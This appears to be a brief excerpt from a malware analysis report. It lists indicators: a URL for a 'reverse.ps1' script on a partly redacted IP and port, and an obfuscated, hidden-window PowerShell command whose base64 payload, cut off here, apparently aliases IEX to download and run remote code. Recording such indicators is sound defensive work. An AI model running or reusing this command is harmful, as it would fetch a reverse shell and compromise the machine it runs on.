Technical Information
- http://78.##.17.88:8443/reverse.ps1
- '<SYSTEM32>\cmd.exe' /c powERShEll.eXe -nop -w hiDDen -e UwBlAHQALQBBAGwAaQBhAHMAIAAtAG4AYQBtAGUAIABxAHUAaQBlAHQAbQBvAHQAaAAgAC0AdgBhAGwAdQBlACAASQBFAFgAOwBxAHUAaQBlAHQAbQBvAHQAaAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOA...
- '78.#5.17.88':8443